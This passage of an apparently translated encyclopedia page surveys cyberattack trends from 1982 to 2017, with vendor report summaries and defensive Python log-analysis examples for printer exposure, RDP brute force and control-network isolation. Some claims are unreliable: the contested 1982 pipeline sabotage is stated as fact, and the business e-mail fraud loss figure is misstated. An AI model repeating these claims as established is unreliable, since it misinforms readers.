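    "ACCEPT proto=tcp src=198.51.100.4:40001 dst=10.1.2.30:631",   # IPP from outside
    "ACCEPT proto=tcp src=10.1.5.12:49152 dst=10.1.2.31:9100",     # internal print job
    "ACCEPT proto=tcp src=203.0.113.7:51300 dst=10.1.2.40:443",    # not a printing port
    "DROP proto=tcp src=203.0.113.7:51301 dst=10.1.2.31:515",      # blocked, no exposure
    "ACCEPT proto=udp src=203.0.113.9:1900 dst=10.1.2.30:631",     # UDP ignored
]


def run_sample() -> dict[str, dict[str, set[str]]]:
    return exposed_printers(SAMPLE_RECORDS)


if __name__ == "__main__":
    for printer, services in run_sample().items():
        for service, sources in services.items():
            print(f"{printer} {service} reachable from {sorted(sources)}")
```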

Stackoverflowin, who claims to be under 18, also stated that he used three vulnerabilities in the web interface of Xerox equipment; these vulnerabilities allow arbitrary code to be executed remotely on that equipment. According to the hacker, details of these flaws have not yet been disclosed.

The message from Stackoverflowin printed by thousands of cracked printers

In general, the hacker remarked that he was even a little upset at how simple the whole venture turned out to be.

On social networks (primarily Twitter), posts with photos of printouts of the hacker's messages are multiplying worldwide, so it is obvious that Stackoverflowin is not bragging without reason.


Fortinet research

Cybercriminals take control of devices
  • IoT devices are extremely attractive to cybercriminals worldwide. Attackers create their own "armies" of devices. Low cost of organizing attacks, very high speed and huge scale are the foundations of the modern ecosystem [16]
  • In Q4 2016 the industry was shaken by the Altaba (formerly Yahoo) data leak and the DDoS attack on Dyn. In the middle of the quarter the record levels set by both attacks were not only exceeded but doubled.
  • Internet of Things (IoT) devices infected with the Mirai botnet initiated a record number of DDoS attacks. After the release of the Mirai source code, the botnet's activity increased 25-fold within a week. By the end of the year activity had increased 125-fold.
  • Research into IoT-related exploit activity across several categories of devices showed that home routers and printers are the most vulnerable, but DVR/NVR devices quickly overtook routers. The number of affected devices in this category increased by more than six orders of magnitude.
  • The problem of malware targeting mobile devices has also gained importance. Although this type of malware accounts for only 1.7 percent of the total, one in five organizations that reported malware attacks encountered its mobile variant. Practically all the exploits were Android-based. Mobile malware attacks showed considerable regional differences: 36 percent of attacks fell on organizations in Africa, 23 percent in Asia, 16 percent in North America and only 8 percent in Europe. These figures should be taken into account when dealing with trusted devices in modern corporate networks.

Dominance of large-scale automated attacks
  • The relationship between the quantity and prevalence of exploits demonstrates the growing automation of attacks and the falling cost of malware and distribution tools available on the dark web. Organizing attacks has become simpler and cheaper than ever.
  • First place in the list of detected high-severity exploits was taken by SQL Slammer, which mainly affects educational institutions.
  • Second in prevalence is an exploit indicating brute-force attempts against Microsoft's Remote Desktop Protocol (RDP). The exploit launches 200 RDP requests every 10 seconds, which explains its considerable activity in the networks of global organizations.
  • Third place in the list of the most widespread exploits was taken by a signature tied to a memory corruption vulnerability in the Windows file manager. Using this vulnerability, an attacker can remotely execute arbitrary code in vulnerable applications by means of a JPG file.
  • The H-Worm and ZeroAccess botnet families showed the highest numbers and prevalence. Using both botnets, cybercriminals take infected systems under control and steal data or engage in advertising fraud and bitcoin mining. The greatest number of attack attempts using these two botnet families was recorded in the technology and government sectors.
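The RDP figure above (200 requests every 10 seconds) is exactly the kind of rate a defender can alert on. This added example (not Fortinet's code; the connection-log format and the traffic are constructed assumptions) implements a per-source sliding window over TCP/3389 connection attempts and raises an alert once any 10-second window holds 200 or more.

```python
"""Sliding-window detection of RDP brute-force traffic.

Assumed log line format (constructed, not a real firewall's):
    'YYYY-MM-DDTHH:MM:SS[.ffffff] CONNECT src=IP dst=IP dport=N'
Lines must be in time order.
"""
from __future__ import annotations

from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 200        # attempts, per the report's "200 requests every 10 seconds"
WINDOW_SECONDS = 10.0
RDP_PORT = 3389


def parse_line(line: str):
    """Return (timestamp, src_ip, dport) or None for lines in another format."""
    parts = line.split()
    if len(parts) != 5 or parts[1] != "CONNECT":
        return None
    fields = dict(p.split("=", 1) for p in parts[2:])
    return datetime.fromisoformat(parts[0]), fields["src"], int(fields["dport"])


def detect_rdp_bruteforce(lines, threshold=THRESHOLD, window=WINDOW_SECONDS) -> dict[str, str]:
    """Return {source_ip: ISO timestamp of the attempt that crossed the threshold}.

    Each source keeps a deque of its recent RDP attempts; timestamps older
    than the window are dropped from the left before the count is checked."""
    recent: dict[str, deque] = defaultdict(deque)
    alerts: dict[str, str] = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, dport = parsed
        if dport != RDP_PORT or src in alerts:   # only RDP; alert once per source
            continue
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:
            q.popleft()
        if len(q) >= threshold:
            alerts[src] = ts.isoformat()
    return alerts


def build_sample_log() -> list[str]:
    """Constructed traffic: one source firing 250 RDP attempts at about 31/s,
    an admin connecting once every 20 s, and unrelated HTTPS connections."""
    base = datetime(2017, 3, 5, 10, 0, 0)
    lines = []
    for i in range(250):
        ts = base + timedelta(milliseconds=32 * i)
        lines.append(f"{ts.isoformat()} CONNECT src=203.0.113.7 dst=10.0.0.5 dport={RDP_PORT}")
    for i in range(5):
        ts = base + timedelta(seconds=20 * i)
        lines.append(f"{ts.isoformat()} CONNECT src=198.51.100.20 dst=10.0.0.5 dport={RDP_PORT}")
    for i in range(300):
        ts = base + timedelta(milliseconds=10 * i)
        lines.append(f"{ts.isoformat()} CONNECT src=192.0.2.9 dst=10.0.0.80 dport=443")
    lines.sort(key=lambda l: l.split()[0])   # ISO timestamps sort lexically
    return lines


if __name__ == "__main__":
    print(detect_rdp_bruteforce(build_sample_log()))
```

The brute-forcing source is flagged on its 200th attempt, 6.368 s in; the admin and the HTTPS traffic never accumulate enough attempts inside a window.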

Ransomware continues to spread
  • Regardless of the industry in which it is used, ransomware deserves attention. Most likely, this effective attack technology will continue to develop within the "Ransomware as a Service" (RaaS) concept. Thanks to it, would-be criminals without the relevant skills can download tools and put them to use immediately.
  • 36% of organizations recorded the activity of ransomware-related botnets. The TorrentLocker trojan showed the greatest activity; Locky took third place.
  • Malware belonging to two families, Nemucod and Agent, was widespread: 81.4 percent of collected malware samples belong to these two families. As is known, the Nemucod family is connected with ransomware.
  • Ransomware was detected in all regions and industries, but it was most widespread in healthcare facilities. This is a very disturbing trend: patient data is under threat, and compared with other types of data it has a longer retention period and greater importance, so the consequences can be serious.

Trend Micro research

Growth of fraud using corporate e-mail

On March 1, 2017 Trend Micro Incorporated published its annual report on cyber security worldwide for 2016, "A Record Year for Enterprise Threats" (2016 Security Roundup: A Record Year for Enterprise Threats).

Main conclusions of the research:

  • Growth in business e-mail fraud: alongside ransomware, business e-mail compromise was also profitable for cybercriminals; companies' financial losses worldwide from such attacks reached $140 thousand in 2016. This type of fraud shows the effectiveness of social engineering methods in attacks on enterprises.
  • Variety of vulnerabilities: in 2016 Trend Micro and the Zero Day Initiative (ZDI) discovered a record number of vulnerabilities, most of them in Adobe Acrobat Reader DC and Advantech's WebAccess. Both applications are widely used in organizations, including in SCADA systems.
  • The Angler exploit kit gave way: after the arrest of 50 cybercriminals, the Angler exploit kit began to fade into the background until it finally ceased to exist. Although new exploit kits did not take long to take its place, by the end of 2016 the number of vulnerabilities included in exploit kits had fallen by 71%.
  • Banking trojans and ATM malware: cybercriminals continue to use ATM malware, skimming and banking trojans. However, in recent years attacks have become more varied and give attackers access to personal information and user credentials that can be used to penetrate the corporate network.
  • The Mirai botnet attack: in October 2016 hackers used poorly protected Internet of Things devices for a DDoS attack in which about 100 thousand devices were used. As a result, websites such as Twitter, Reddit and Spotify were unavailable for several hours.
  • Yahoo user data leak: the company suffered a major data leak in August 2013, with about 1 billion user accounts compromised. The incident became known three months after another leak, in September 2016, as a result of which a further 500 million accounts were affected.
  • Growth in the number of ransomware programs. For more details see Ransomware (encryption virus).

Trend Micro forecast for 2017

On December 8, 2016 it became known that, according to Trend Micro Incorporated's forecasts, in 2017 the scope and depth of attacks will increase, as will the variety of attackers' tactics.

Trend Micro Incorporated published its annual report with information security forecasts for 2017, "The Next Tier – 8 Security Predictions for 2017"[17].

Raimund Genes, CTO Trend Micro:
Next year will bring the cyber security industry to new frontiers. In 2016 the threat landscape allowed cybercriminals to considerably increase the variety of attack methods and types of targets. In our opinion, the need to comply with the "act on personal data protection" worldwide (General Data Protection Regulation, GDPR) will cause big changes in companies. In addition, we predict the emergence of new methods of attack on large corporations, the expansion of online extortion tactics to an ever wider variety of devices, and the use of cyber-propaganda methods to manipulate public opinion.

In 2016 the number of vulnerabilities in Apple devices grew considerably: fifty were announced in a year. For comparison, for Adobe products this figure was 135 and for Microsoft products 76. This noticeable shift towards Apple will intensify further.

The Internet of Things (IoT) and the Industrial Internet of Things (IIoT) will play an increasingly significant role in targeted attacks in 2017.

Such attacks will be very profitable because of the ubiquity of connected devices and the opportunity to exploit the vulnerabilities they contain and use unprotected corporate systems to disrupt business processes in companies, as in the case of the Mirai malware. The growing use of mobile devices to monitor control systems at production and infrastructure facilities, combined with the large number of vulnerabilities found in these systems, will pose a real threat to organizations.

Business Email Compromise (BEC) and Business Process Compromise (BPC) will continue to spread as a simple and effective method of corporate online extortion. BEC fraud, for example, can bring attackers $140 thousand; all that is required is to convince the victim to transfer corporate assets to the fraudsters' account. By comparison, compromising a financial transaction system, although it requires greater effort, can bring attackers much more: the amount can reach $81 million.

We see how cybercriminals continue to adapt to the constantly changing technology landscape. Whereas in 2016 there was significant growth in the number of new ransomware programs, now it has decreased considerably, so hackers will look for new ways to use the existing types of such programs. Similarly, innovations in the Internet of Things allow hackers to find other targets for attacks, and changes in software push them to look for new vulnerabilities.

Ed Cabrera, Chief Cybersecurity Officer, Trend Micro

Forecasts for 2017:

  • Growth in the number of new ransomware families will slow to about 25%, but their influence will extend to Internet of Things devices, PoS terminals and ATMs.
  • Developers will not be able to provide timely protection of Internet of Things and Industrial Internet of Things devices against DoS and other types of attacks.
  • More and more new vulnerabilities that will be added to exploit kits will be found in Apple and Adobe products.
  • Since 46% of the world's population has Internet access, the role of cyber-propaganda in influencing public opinion will grow.
  • The example of the attack on the central bank of Bangladesh at the beginning of 2016 proves that business process compromise attacks allow attackers to make considerable profit. At the same time, business e-mail fraud methods will remain an effective method of illegal enrichment at the expense of unsuspecting employees.
  • Entry into force of the "act on personal data protection" (General Data Protection Regulation, GDPR) will cause changes in regulations and administrative procedures which, in turn, will seriously affect organizations' costs and require them to completely review their data processing for compliance with the new requirements.
  • New methods of targeted attacks will be aimed at evading modern detection technologies and attacking companies in the most diverse areas.

Panda Security white paper on attacks against critical infrastructure

On November 30, 2016 PandaLabs, the research division of Panda Security, announced the release of a white paper describing the most notorious cyber attacks on critical infrastructure facilities in the world and recommending methods of protecting what is the backbone of the modern economy. Below is a fragment of the publication.

White book Panda Security, (2016)

The growing interconnection of all types of infrastructure means a growing number of potential entry points for attacks on facilities that have become vital to modern society. This also applies to the cyber attacks carried out against such networks in the past: one of the first took place in 1982, before the Internet existed. Hackers then used a trojan to infect the control systems of a Siberian oil pipeline, which led to one of the most powerful non-nuclear explosions in the world.

Besides partially or completely halting critical infrastructure facilities, as happened to the Venezuelan oil company PDVSA, where an attack cut oil production from 3 million to 370 thousand barrels a day, such attacks also cause significant financial damage. One of the largest car manufacturers in the USA lost $150 million "thanks to" the SQL Slammer attack, which quickly spread to 17 of the company's plants.

Stuxnet is one of the most notorious cyber attacks on critical infrastructure in history. It is now known to have been a sanctioned operation of the American and Israeli intelligence agencies aimed at derailing Iran's nuclear program. This case became the catalyst that made the world community aware of this type of threat.

Several events over the years have become milestones in the development of global security, in particular the attacks of September 11. Europe has a similar date, March 11, 2004, when trains were bombed in Madrid. As a result, the European Commission developed a comprehensive strategy for protecting critical infrastructure, the European Programme for Critical Infrastructure Protection, which proposes improvements to the set of measures in Europe intended to prevent terrorist attacks and respond to them effectively.

Such attacks can also steal the technical specifications of critical infrastructure facilities and huge volumes of other crucial data. This means that special measures are needed to protect such infrastructure, including the following accepted practices:

  • Checking systems for vulnerabilities.
  • Adequate monitoring of the networks used to control such infrastructure facilities and, where necessary, their complete isolation from external connections.
  • Control over removable devices, which is extremely important in any infrastructure, and not only because they were the attack vector in the Stuxnet case. When protecting critical infrastructure it is vital to ensure that malware cannot enter internal networks via removable devices, which can also be used to steal confidential information.
  • Monitoring of the computers to which programmable logic controllers (PLCs) are connected. When connected to the Internet these devices are the most sensitive, since they can give hackers access to crucial control systems. Even if hackers cannot take control of the system, they can obtain valuable information for other lines of attack[18].
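Two of these practices, isolation of the control network from external connections and monitoring of the hosts that reach PLCs, can be checked mechanically against connection records. The following is an added example, not code from Panda Security; the network ranges and the log lines are assumed values constructed for it:

```python
"""Added example (not code from the Panda Security white paper): check control
network connection records for isolation breaches and unexpected PLC access.
Networks and log lines are constructed for the example."""
import ipaddress
from dataclasses import dataclass

CONTROL_NET = ipaddress.ip_network("10.10.0.0/16")      # assumed OT network
PLC_NET = ipaddress.ip_network("10.10.5.0/24")          # assumed PLC subnet
ENGINEERING_NET = ipaddress.ip_network("10.10.1.0/24")  # assumed: may reach PLCs

@dataclass(frozen=True)
class Finding:
    ts: str
    host: str     # control-network host involved
    peer: str     # address it exchanged traffic with
    reason: str

def parse_record(line):
    """Record format (constructed): 'ts src dst dport proto'."""
    ts, src, dst, dport, proto = line.split()
    return ts, ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport), proto

def check_isolation(records):
    """Return one Finding per record that violates the two rules below."""
    findings = []
    for line in records:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, _dport, _proto = parse_record(line)
        src_in, dst_in = src in CONTROL_NET, dst in CONTROL_NET
        # Rule 1: any traffic crossing the control-network boundary breaks isolation.
        if src_in and not dst_in:
            findings.append(Finding(ts, str(src), str(dst), "outbound from control network"))
        elif dst_in and not src_in:
            findings.append(Finding(ts, str(dst), str(src), "inbound into control network"))
        # Rule 2: a PLC reached from an internal host that is not an engineering workstation.
        if dst in PLC_NET and src_in and src not in ENGINEERING_NET and src not in PLC_NET:
            findings.append(Finding(ts, str(dst), str(src), "PLC reached from non-engineering host"))
    return findings

# Constructed sample: Modbus/TCP (port 502) sessions plus two boundary crossings.
SAMPLE_LOG = """\
# ts                   src           dst           dport proto
2016-11-30T08:00:01Z   10.10.1.20    10.10.5.7     502   tcp
2016-11-30T08:00:05Z   10.10.5.7     10.10.1.20    502   tcp
2016-11-30T08:01:10Z   10.10.1.20    203.0.113.50  443   tcp
2016-11-30T08:02:30Z   198.51.100.9  10.10.5.7     502   tcp
2016-11-30T08:03:00Z   10.10.7.15    10.10.5.7     502   tcp
"""

if __name__ == "__main__":
    for f in check_isolation(SAMPLE_LOG.splitlines()):
        print(f"{f.ts} {f.host} <-> {f.peer}: {f.reason}")
```

Run against the sample it reports the outbound connection to a public address, the inbound connection from outside, and the PLC session from a host outside the engineering subnet, while the legitimate engineering-workstation sessions are left alone.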

2015: The 10 most dangerous cyber attacks of the year

Neither personal information nor fingerprints were fully safe from cybercriminals in 2015[19]. Below is a brief summary of the most dangerous and alarming attacks of 2015.

Theft of fingerprints

Although fingerprints are considered one of the safest methods of biometric security (it is the method used to unlock the iPhone), the theft of information belonging to U.S. Government employees showed that this system has various problems worth paying attention to.

In June 2015 a group of cybercriminals managed to steal the fingerprints of about six million employees of U.S. federal agencies and organizations, which could endanger not only their mobile phones but also the security of the country[20].

Remote control over smart cars

Another major problem facing cyber security specialists is the incident with smart cars[21]. Until there is a proper solution, these cars will remain vulnerable to manipulation. Last summer two hackers showed that bugs in the computer system of a Jeep Cherokee could be used to take control of the car, even managing to apply its brakes, and all of this was done remotely.

Thousands of infected Android devices

Not all vulnerabilities in the world of IT security concern cutting-edge solutions and devices. In fact, smartphones were at the center of a mass scandal in 2015 when thousands of Android devices were infected via Stagefright: as a result of this security incident cybercriminals could gain access to any Android phone and control it without its owner's knowledge.

Furor over online dating

Undoubtedly the biggest scandal of the year was the leak of information about more than 32 million users of the Ashley Madison online dating website[22]. This incident sent a shock wave through cyber security worldwide, once again reminding each of us (users and owners of online platforms alike) of the dangers IT security faces.

Vulnerable infusion pump

People's health and safety are also at risk because of vulnerabilities in various devices. It is not only about smart cars that can be controlled remotely to cause a road accident: in 2015 there was an incident with an infusion pump used in hospitals. It turned out that if a cybercriminal managed to connect to the hospital's local network, he could gain access to this device, manipulate it and change its operating parameters.

Risks for gas stations

Not only hospital devices but also gas stations can be in danger, as researchers on both sides of the Atlantic found. Having connected to the network, cybercriminals can attack fuel pumps, which can even lead to an explosion.

A year Apple would like to forget

2015 was the worst year for Apple in terms of security: the number of attacks aimed at its devices grew fivefold compared with 2014, while the number of new vulnerabilities continued to grow. One example is the Dyld flaw discovered last summer[23].

Theft of data through third parties

In 2015 the data of 15 million T-Mobile customers was stolen by cybercriminals. According to the company, the information was not taken from its corporate servers but stolen from the company that handled payments of T-Mobile customers.

Theft of data via web browsers

In the summer of 2015 Firefox had to tell its users that a failure in the browser was caused by an incident[24] in which cybercriminals could find and steal users' files without their permission.

A bad end to the year for Dell

The last scandal of 2015 came in December, when it was revealed that the latest Dell computer models shipped with serious security flaws. Thanks to these vulnerabilities cybercriminals could alter communications between different systems and steal information from the affected computers.


The number of attacks grew by 81%

In 2011 Symantec recorded more than 5.5 billion attacks, 81% more than the year before. In addition, the number of unique malware samples in the world rose to 403 million, and the number of daily web attacks grew by 36%.

At the same time the level of spam fell considerably, and the number of new vulnerabilities decreased by 20%. Against the background of the continuing growth of the malware market, these global statistics reveal an interesting trend: attackers began to use simple tools against existing vulnerabilities. Cybercriminals increasingly target social networks, preferring them to spam. The nature of such networks gives users a false sense of safety, and attackers see new victims in them. Social engineering techniques and the viral nature of social networks let threats spread at enormous speed.

Intel Security: The new wave of attacks will target industrial and energy companies

As of July 2011, according to McAfee, cybercriminals had spent at least 5 years conducting targeted attacks on 70 government institutions, non-profit organizations and corporations in order to steal data. Among them were, for example, the UN, the International Olympic Committee (IOC) and businesses located in the USA.

McAfee does not specify who is behind these attacks. Most of the victims are not named in the McAfee report, nor is it stated what data was stolen from them. It is only reported that, besides the USA, the affected companies and organizations are from countries such as Canada, South Korea, Taiwan, Japan and many others.

The report came after a whole series of highly skilled hacker attacks in recent months that hit Citigroup, Sony Corp., Lockheed Martin, PBS and others. According to McAfee experts, so-called hacktivist groups such as Anonymous and LulzSec were involved in all of them.

According to Dmitri Alperovitch, McAfee's vice president of threat research and the author of the report, the threat is much bigger, and many cases were simply never made public. The key to these intrusions, in his words, "is a massive hunger for other people's secrets and intellectual property".

However, not all organizations take the researchers' words seriously. In particular, IOC representative Mark Adams said that so far the McAfee researchers had not provided them with proof of attempts to compromise the committee's information security.

"If it is true, then of course it cannot but trouble us. However, the IOC is a transparent organization and has no secrets that would threaten our activity or reputation," he added.

Meanwhile, researchers warn that industrial and energy companies in particular can become the new targets of cyber attacks.

"It is not a threat only to the USA, it is a global threat," said Tim Roxey, director of risk management at the North American Electric Reliability Corporation (NERC).

By this corporation's estimates, hackers are able to gain access to any power plant equipment, including turbine valves.

He also recalled how a group of scientists was forced to leave a nuclear reactor as a result of an attack by the notorious Stuxnet virus. According to Siemens AG experts, such attacks do not even require a coordinated hacker group: a single person with sufficient experience and time can organize an attack alone.

2010: Attacks spread to operating systems other than Windows

2010 saw a significant turn in cyber crime: for the first time in history hackers began to shift their attention from the PC and Windows to other operating systems and platforms, including smartphones, tablets and mobile devices in general. This was stated in Cisco's annual information security report for 2010, published on January 20, 2011.

Over the previous ten years hackers had aimed first of all at PC operating systems. In response, PC platform and application vendors strengthened the protection of their products and began to look for and close vulnerabilities much more actively using patches. As a result it became harder for hackers to crack the platforms (Windows in particular) that had previously been their bread and butter. So attackers are looking for new areas in which to apply their malicious "talents", and mobile devices and applications, which were beginning to spread rapidly in the market, came along at just the right time. As a result, in 2011 the greatest threat to users is concealed in mobile applications created by third-party developers.

1982: CIA blows up the Soviet gas pipeline

CIA staff planted a bug in Canadian software for controlling gas pipelines. Soviet intelligence obtained this software through industrial espionage and deployed it on the Trans-Siberian pipeline. The result was the largest non-nuclear explosion in human history, which happened in 1982.

See Also


  1. IoT conceals hidden threats
  2. Experts assessed damages from global cyber attack at $85 billion - $193 billion
  3. Four US gas pipeline data systems shut down as cyberattack hits
  4. Results of the year: cyber attacks are getting more expensive
  5. A computer which "cannot be cracked" is invented
  6. Most Russian companies are not resilient to cyber attacks, PwC states
  7. AppsFlyer presented Protect360 for protecting business against mobile fraud
  8. Insurers counted the damage to the world economy from a global cyber attack
  9. Fortinet global threat research report
  10. The Fortinet global threat research report presents data collected by FortiGuard Labs using an extensive network of devices and sensors in production environments in the 1st quarter of 2017. Data was collected at global, regional, sectoral and organizational scale. The focus was on three interconnected types of threats: application exploits, malicious software and botnets. Fortinet also publishes a threat data report (free with a subscription) providing a weekly overview of the most dangerous viruses, malware and network threats, as well as links to the most relevant Fortinet research.
  11. Hackers opened hunting season on state databases
  12. Increase in jRAT Campaigns
  13. Printers turned out to be dangerous to corporate networks
  14. A young hacker
  15. cracked 160 thousand printers worldwide
  16. The Fortinet global threat research report on cybercrime presents data collected by FortiGuard Labs in the 4th quarter of 2016. Data was collected at global, regional, sectoral and organizational scale. The focus was on three interconnected types of threats: application exploits, malicious software and botnets.
  17. The Next Tier – 8 Security Predictions for 2017
  18. Panda Security: Critical infrastructure
  19. The 10 most alarming cyberattacks of 2015
  20. US government hack stole fingerprints of 5.6 million federal employees
  21. Security shortcomings affecting "connected" cars
  22. Lessons we should learn from the Ashley Madison data leak
  23. Apple applied security measures to the Mac OS X operating system after a bad year
  24. You need to update Firefox right now to protect yourself from a big security flaw